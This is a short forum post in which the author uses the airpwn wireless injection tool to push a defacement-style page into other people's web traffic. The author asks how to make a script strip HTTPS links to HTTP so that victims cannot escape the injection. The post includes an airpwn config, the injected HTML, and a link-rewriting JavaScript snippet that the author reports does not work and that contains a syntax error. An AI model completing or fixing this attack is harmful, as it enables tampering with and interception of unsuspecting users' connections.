I've been playing with airpwn for sometime and i believe most of you must be familiar with the fact that the attack can be bypassed with https so i am trying to trigger a script which replace https with http at the time of process.
conf:
Code:
begin example_html
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tif|tiff)
response content/example_html
content:
Code:
<html>
<head>
<title>example</title>
</head>
<body bgcolor="black">
<font size="+5" color="#FF0000">wAzZUp G33ks</font><font size="+5" color="red">!</font><p>
<img border="0" src="example.jpg" width="618" height="387" /></p>
<p><font color="#FF0000"><a href='javascript:onClick=alert("https into http")'>
Test</a> </font></p>
<p><font color="#FF0000"><a href="mailto:isp@isp.com">s33K H3lp</a></font></p>
</body>
</html>
i did google and i found something related to it
Code:
var refs =
document.getElementsByTagName('a');
for (var i = 0; i < refs.length; i++){
var rval =
refs[i].getAttribute("href");
if (rval == null) { continue; }
refs[i].setAttribute("href",
rval.replace(/^https:/, "http:");
}
it doesn't work if we embed this code in our HTML.
i am completely lost.please share your experiences,how you guys overcome this problem or suggest me any way to make it work.
Regards !!!
minor problem (airpwn)
Posting Permissions